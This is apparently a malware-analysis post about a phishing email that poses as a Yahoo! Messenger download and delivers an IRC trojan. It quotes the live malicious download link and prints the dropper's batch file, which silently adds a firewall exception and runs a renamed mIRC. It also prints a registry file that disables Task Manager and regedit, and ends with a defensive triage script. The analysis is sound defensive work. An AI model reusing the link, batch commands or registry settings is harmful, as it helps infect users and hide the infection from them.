Yahoo! Messenger <http://messenger.yahoo.com>
Preview the new
Yahoo! Messenger for Vista™
The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>
Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>
We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview
Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).
See what's in store...
* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling
©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.
Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
The download link in the e-mail,
hxxp://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe
leads to an IP address in China. Scanning the file with VirusTotal shows it is an IRC trojan:
http://www.virustotal.com/analisis/a9e91000bd66003d3871e28c92b51a3b
Extracting the file shows that it drops what claims to be a DLL named fp721ext.dll. This "DLL" is actually a folder, and it contains the files shown in the following screenshot:
As you can see, there are quite a few in there. mIRC itself, a legitimate IRC client, has been renamed to mircrosoft.exe. The folder also contains a file called csc.cmd. Among other things (launching anyssya.jpg and silently importing regis.reg), it adds an exception to the Windows Firewall so that mircrosoft.exe can connect to the attacker's IRC channel without prompting you:
@echo off
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
EXIT
regis.reg contains the following:
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a
[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"
[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"
[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001
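A small triage script for the csc.cmd and regis.reg pair shown above, added here as an example and not code from the original post. It parses the REGEDIT4 export (merging the repeated Policies\System key the way regedit /s itself would), flags the policy values that stop the victim from investigating (DisableRegistryTools, DisableTaskMgr, NoTrayItemsDisplay), and pulls the firewall exception and the silent registry import out of the batch file. The sample inputs are the file contents quoted above (the .reg is abridged); the list of flagged value names and the rule that any non-zero DWORD counts as "set" are the script's own assumptions.

```python
"""Triage helper for a dropped .cmd / .reg pair such as csc.cmd and regis.reg.

Added example for this write-up, not code from the original post. The sample
inputs below are the file contents quoted in the post (the .reg is abridged).
"""
import re
from typing import Dict, List, Optional, Union

RegValue = Union[int, str, bytes]

# Policy values that, when non-zero, hamper a user's ability to inspect the
# machine. The list and the "any non-zero value counts as set" rule are this
# script's assumptions, not something the post states.
SUSPICIOUS_POLICY_VALUES = {
    "DisableRegistryTools": "blocks regedit",
    "DisableTaskMgr": "blocks Task Manager",
    "NoTrayItemsDisplay": "hides every tray icon",
}

# netsh firewall add allowedprogram <path> <display name> ENABLE|DISABLE
NETSH_ALLOW = re.compile(
    r'netsh\s+firewall\s+add\s+allowedprogram\s+'
    r'(?P<path>"[^"]+"|\S+)\s+(?P<label>"[^"]+"|\S+)\s+(?P<mode>ENABLE|DISABLE)',
    re.IGNORECASE,
)
# regedit /s "<file>" imports a .reg file without any prompt
REGEDIT_SILENT = re.compile(r'regedit(?:\.exe)?\s+/s\s+"?(?P<path>[^"\r\n]+)', re.IGNORECASE)
# "Name"=value or @=value (default value) inside a [key] section
REG_VALUE = re.compile(r'^(?:@|"(?P<name>[^"]+)")=(?P<val>.*)$')

SAMPLE_CMD = r"""@echo off
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
EXIT
"""

SAMPLE_REG = r"""REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001
"""


def parse_reg(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Parse a REGEDIT4 export into {key_path: {value_name: value}}.

    Repeated [key] headers are merged into one dict, which is what regedit
    does on import. dword: becomes int, hex: becomes bytes, quoted text str."""
    keys: Dict[str, Dict[str, RegValue]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REGEDIT"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = REG_VALUE.match(line)
        if m is None or current is None:
            continue
        name = m.group("name") or "@"
        val = m.group("val").strip()
        if val.lower().startswith("dword:"):
            keys[current][name] = int(val[6:], 16)
        elif val.lower().startswith("hex:"):
            keys[current][name] = bytes(int(b, 16) for b in val[4:].split(",") if b)
        elif len(val) >= 2 and val[0] == val[-1] == '"':
            keys[current][name] = val[1:-1]
        else:
            keys[current][name] = val
    return keys


def _as_int(value: RegValue) -> Optional[int]:
    """DWORDs are already ints; REG_BINARY is read as a little-endian integer."""
    if isinstance(value, int):
        return value
    if isinstance(value, bytes):
        return int.from_bytes(value, "little")
    return None


def reg_findings(keys: Dict[str, Dict[str, RegValue]]) -> List[str]:
    """Flag non-zero suspicious values under any ...\\Policies\\... key."""
    out: List[str] = []
    for key, values in keys.items():
        if "\\Policies\\" not in key:
            continue
        for name, value in values.items():
            n = _as_int(value)
            if name in SUSPICIOUS_POLICY_VALUES and n:
                out.append(f"policy {key}\\{name} = {n} ({SUSPICIOUS_POLICY_VALUES[name]})")
    return out


def cmd_findings(text: str) -> List[str]:
    """Flag firewall exceptions and silent .reg imports in a batch file."""
    out: List[str] = []
    for m in NETSH_ALLOW.finditer(text):
        out.append(f"firewall exception: {m.group('path')} listed as "
                   f"{m.group('label')} ({m.group('mode').upper()})")
    for m in REGEDIT_SILENT.finditer(text):
        out.append(f"silent registry import: {m.group('path').strip()}")
    return out


def triage(reg_text: str, cmd_text: str) -> List[str]:
    return reg_findings(parse_reg(reg_text)) + cmd_findings(cmd_text)


if __name__ == "__main__":
    for finding in triage(SAMPLE_REG, SAMPLE_CMD):
        print(finding)
```

Two details worth noticing when you run it: the two separate [Policies\System] sections collapse into one key, so both DisableRegistryTools and DisableTaskMgr are reported from a single place, and DisableTaskMgr comes out as 10 rather than 1, which the script still treats as "set". NoDriveTypeAutoRun=0x91 is not flagged because it is the ordinary Windows XP default.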
anyssya.jpg actually is a JPG file, and its detection at VT is non-existent. However, since it's also launched by the csc.cmd file, I'm betting it's a little more than it seems.
The infection, judging by the .ini files, seems to connect to 89.35.207.106 (client-8935207106.raknetsoft.ro).
I'll post further analysis once complete. In the meantime, the e-mail itself originated from 66.51.252.238 (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties:
From: Yahoo! Vista
E-mail: vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !